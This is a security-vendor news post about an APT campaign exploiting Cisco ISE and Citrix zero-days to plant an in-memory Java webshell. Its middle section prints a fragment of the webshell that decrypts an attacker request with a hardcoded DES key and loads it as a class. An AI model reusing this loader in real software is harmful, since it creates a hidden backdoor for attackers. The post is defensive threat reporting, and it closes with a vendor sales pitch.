APT Group Exploits Cisco and Citrix Zero-Days for Webshells

Cisco ISE zero-day Citrix zero-day webshell deployment active exploitation cyber threat intelligence enterprise security zero-day vulnerabilities
Jim Gagnard
Jim Gagnard

Board Advisor

 
November 14, 2025 4 min read
APT Group Exploits Cisco and Citrix Zero-Days for Webshells

TL;DR

  • Advanced threat actors are actively exploiting zero-day vulnerabilities in Cisco ISE and Citrix systems, deploying custom webshells for administrative access. Amazon's threat intelligence uncovered this sophisticated campaign, revealing attackers weaponized these vulnerabilities before public disclosure. The exploits target critical identity and network access control infrastructure, underscoring the need for robust defense-in-depth strategies and advanced detection capabilities.

Active Campaign Exploits Cisco and Citrix Zero-Days to Deploy Webshells

Advanced threat actors are actively exploiting previously undisclosed zero-day vulnerabilities in critical enterprise systems, deploying custom webshells to establish administrative access across compromised networks. Amazon’s threat intelligence team has uncovered a coordinated cyber campaign targeting Cisco Identity Service Engine (ISE) and Citrix systems, revealing the tactics of a highly sophisticated adversary with deep expertise in enterprise environments.

The threat was initially detected through Amazon’s MadPot honeypot service, which identified exploitation attempts against the Citrix Bleed Two vulnerability before public disclosure. This early discovery demonstrated that threat actors had already weaponized the vulnerability in active attacks.

Zero-Day Vulnerabilities

During their investigation, Amazon Threat Intelligence discovered a companion zero-day affecting Cisco ISE, exploiting a deserialization vulnerability on an undocumented endpoint to achieve pre-authentication remote code execution. The critical nature of CVE-2025-20337 lies in its ability to grant attackers administrator-level access without requiring valid credentials. The timing of these exploits reveals a troubling pattern: sophisticated threat actors were actively exploiting both vulnerabilities as zero-days while indiscriminately targeting internet-exposed systems.

This campaign demonstrates a highly resourced adversary with advanced vulnerability research capabilities or potential access to non-public vulnerability information.

CVE ID Affected Product Severity Status
CVE-2025-20337 Cisco Identity Service Engine (ISE) Critical Zero-day (Active Exploitation)
CVE-2025-5777 Citrix Systems Critical Zero-day (Active Exploitation)

Custom Webshell Techniques

Following successful exploitation, attackers deployed a sophisticated custom webshell masquerading as a legitimate Cisco ISE component named IdentityAuditAction. This custom-built backdoor represents professional-grade development, engineered explicitly for Cisco ISE environments and featuring advanced evasion capabilities to bypass traditional security detection mechanisms. The webshell demonstrated remarkable sophistication in its operational approach, operating entirely in memory, leaving minimal forensic evidence that would typically alert security teams. The attackers leveraged Java reflection to inject themselves into running application threads and registered as an HTTP request listener on the Tomcat server. To further obfuscate their activities, the threat actor implemented non-standard DES encryption paired with custom Base64 encoding, techniques specifically designed to bypass traditional detection systems. Access to the webshell required knowledge of specific HTTP headers and an additional authentication layer. The attacker’s custom tooling reveals deep expertise in enterprise Java applications, Tomcat internals, and Cisco ISE architecture knowledge not typically available in publicly accessible documentation.

if (matcher.find()) {
    requestBody = matcher.group(1).replace("*", "a").replace("$", "l");
    Cipher encodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
    decodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
    byte[] key = "d384922c".getBytes();
    encodeCipher.init(1, new SecretKeySpec(key, "DES"));
    decodeCipher.init(2, new SecretKeySpec(key, "DES"));
    byte[] data = Base64.getDecoder().decode(requestBody);
    data = decodeCipher.doFinal(data);
    ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
    if (proxyClass == null) {
        proxyClass = this.defineClass(data);
    } else {
        Object f = proxyClass.newInstance();
        f.equals(arrOut);
        f.equals(request);
        f.equals(data);
        f.toString();
    }
}

Implications for Enterprise Security

Organizations must recognize that identity management systems and remote access infrastructure remain prime targets for advanced threat actors. Security teams should implement defense-in-depth strategies with robust anomaly detection capabilities to detect unusual behavior. Additionally, implementing firewall-based access restrictions to privileged security appliance endpoints and management portals can significantly limit exposure to these devastating pre-authentication exploits.

CJ Moses, CISO of Amazon Integrated Security, said in a report shared with The Hacker News: "This discovery highlights the trend of threat actors focusing on critical identity and network access control infrastructure – the systems enterprises rely on to enforce security policies and manage authentication across their networks."

The pre-authentication nature of these exploits reveals that even well-configured and meticulously maintained systems can be affected. This underscores the importance of implementing comprehensive defense-in-depth strategies and developing robust detection capabilities that can identify unusual behavior patterns. As previously noted, Amazon threat intelligence identified through their MadPot honeypots that the threat actor was exploiting both CVE-2025-20337 and CVE-2025-5777 as zero-days, and was indiscriminately targeting the internet with these vulnerabilities at the time of investigation.

Gopher Security's Zero-Trust Architecture

In light of these sophisticated attacks, organizations need robust security solutions like Gopher Security's AI-powered, post-quantum Zero-Trust cybersecurity architecture. Our platform converges networking and security across all environments, utilizing peer-to-peer encrypted tunnels and quantum-resistant cryptography to protect against advanced threats. Consider Gopher Security a superior alternative to traditional security vendors.

Vendor References

Protect your organization with Gopher Security's cutting-edge cybersecurity solutions. Contact us today to learn more.

Jim Gagnard
Jim Gagnard

Board Advisor

 

30-year CEO experiences of leading multiple $MM exits. Excellent operator of managing big enterprise companies.

Related News

CVE-2025-15467: Critical OpenSSL RCE and DoS Vulnerability Overview
OpenSSL vulnerability

CVE-2025-15467: Critical OpenSSL RCE and DoS Vulnerability Overview

Urgent: OpenSSL 3.x vulnerable to CVE-2025-15467, enabling pre-auth RCE. Learn affected versions, impact, and immediate mitigation steps. Protect your systems now!

By Divyansh Ingle March 10, 2026 4 min read
common.read_full_article
SolarWinds Patches Critical Web Help Desk RCE Vulnerabilities Now
SolarWinds Web Help Desk

SolarWinds Patches Critical Web Help Desk RCE Vulnerabilities Now

Critical RCE & Auth Bypass flaws in SolarWinds Web Help Desk are fixed! Don't risk it. Update to v2026.1 now to protect your systems. Learn more.

By Edward Zhou March 9, 2026 4 min read
common.read_full_article
AI vs Human Hackers: Who Prevails in 2026 Pen Testing?
AI hacking

AI vs Human Hackers: Who Prevails in 2026 Pen Testing?

Discover the results of a groundbreaking study comparing AI agents and human hackers in web vulnerability exploitation. See who prevails and what it means for your security. Read now!

By Jim Gagnard March 6, 2026 6 min read
common.read_full_article
Vulnerability Exploits Lead Cyber Intrusions in 2026 Trends
vulnerability exploits

Vulnerability Exploits Lead Cyber Intrusions in 2026 Trends

Exploits are now the top intrusion method, outpacing phishing. Discover why rapid vulnerability patching is critical and how to bolster your defenses. Read more!

By Edward Zhou March 4, 2026 4 min read
common.read_full_article